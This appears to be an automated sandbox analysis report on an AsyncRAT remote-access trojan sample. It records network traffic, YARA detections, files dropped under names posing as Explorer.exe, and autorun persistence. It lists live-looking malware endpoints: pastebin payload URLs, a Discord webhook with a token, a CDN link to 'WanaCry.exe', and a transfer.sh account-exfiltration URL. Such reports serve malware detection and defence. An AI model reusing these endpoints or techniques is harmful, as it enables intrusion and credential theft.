                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficDNS traffic detected: DNS query: pastebin.com
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: http://ipv4bot.whatismyipaddress.com/
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000011.00000002.2159201232.0000000003461000.00000004.00000800.00020000.00000000.sdmp, explore.exe, 00000018.00000002.2221220011.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: http://pastebin.com/raw/KKpnJShN
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/KKpnJShNd
                        Source: explore.exe, 00000018.00000002.2221220011.00000000030E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/hbwHfEg3
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/hbwHfEg3d
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                        Source: rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://cdn.discordapp.com/attachments/903603651585663016/913496700734279730/WanaCry.exe
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://discord.com/api/webhooks/780783005307895818/1tcNqwidYko-32qqkw7-SN35HpBY-1NoZHwFmRnTSgREpOcu
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://dl.teamviewer.com/download/TeamViewer_Setup_x64.exe
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002D0D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002CE3000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002C42000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/KKpnJShN
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://pastebin.com/raw/hFaPBSUm
                        Source: Explorer.exe, 00000010.00000002.4490902100.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe, 00000010.00000002.4490902100.0000000002B75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/hbwHfEg3
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://transfer.sh/Accounts.txt?
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://www.techniknews.net/wp-content/uploads/2018/07/discord-logo.jpg
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.drString found in binary or memory: https://youtu.be/9Ew461CAlmQ?t=10Chttps://youtu.be/xAZMu-qKLxE?t=35
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49769 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49894 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50024 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50031 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50032 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50035 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50038 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50058 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50059 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information set: 00 00 00 00 Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\explore.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CA6FAA
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA848E0_2_00CA848E
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB6CDC0_2_00CB6CDC
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA40FE0_2_00CA40FE
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB40880_2_00CB4088
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB00B70_2_00CB00B7
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CC51C90_2_00CC51C9
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB71530_2_00CB7153
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB62CA0_2_00CB62CA
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA32F70_2_00CA32F7
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB43BF0_2_00CB43BF
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CCD4400_2_00CCD440
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAF4610_2_00CAF461
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAC4260_2_00CAC426
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB77EF0_2_00CB77EF
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CCD8EE0_2_00CCD8EE
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CA286B0_2_00CA286B
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CD19F40_2_00CD19F4
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAE9B70_2_00CAE9B7
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CB3E0B0_2_00CB3E0B
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAEFE20_2_00CAEFE2
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CC4F9A0_2_00CC4F9A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E8A8254_2_00E8A825
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E998324_2_00E99832
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E850174_2_00E85017
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E859C74_2_00E859C7
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00EA226E4_2_00EA226E
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E99A614_2_00E99A61
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00EA63844_2_00EA6384
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E8B4B34_2_00E8B4B3
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00EA1DC04_2_00EA1DC0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E855B84_2_00E855B8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: String function: 00E93AC0 appears 44 times
